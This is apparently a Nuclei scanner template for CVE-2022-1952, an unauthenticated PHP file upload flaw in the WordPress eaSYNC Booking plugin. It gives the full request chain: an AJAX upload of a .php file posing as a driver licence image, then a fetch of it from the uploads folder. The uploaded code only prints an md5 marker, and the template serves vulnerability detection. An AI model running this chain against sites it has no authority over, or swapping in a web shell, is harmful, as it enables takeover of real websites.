81 lines
2.8 KiB
YAML
81 lines
2.8 KiB
YAML
id: CVE-2022-1952
|
|
|
|
info:
|
|
name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
|
|
- https://wordpress.org/plugins/easync-booking/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1952
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-1952
|
|
cwe-id: CWE-434
|
|
cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:*:*:*
|
|
epss-score: 0.96693
|
|
metadata:
|
|
max-request: 3
|
|
verified: true
|
|
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
|
|
Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059
|
|
|
|
--------------------------98efee55508c5059
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
easync_session_store
|
|
--------------------------98efee55508c5059
|
|
Content-Disposition: form-data; name="type"
|
|
|
|
car
|
|
--------------------------98efee55508c5059
|
|
Content-Disposition: form-data; name="with_driver"
|
|
|
|
self-driven
|
|
--------------------------98efee55508c5059
|
|
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php echo md5('CVE-2022-1952');?>
|
|
|
|
--------------------------98efee55508c5059--
|
|
|
|
- |
|
|
GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
|
|
|
|
- |
|
|
GET /wp-content/uploads/{{filename}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(all_headers_3, "text/html")
|
|
- status_code_3 == 200
|
|
- contains(body_1, 'success\":true')
|
|
- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: filename
|
|
group: 1
|
|
regex:
|
|
- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
|
|
internal: true
|
|
|
|
# Enhanced by md on 2023/04/07
|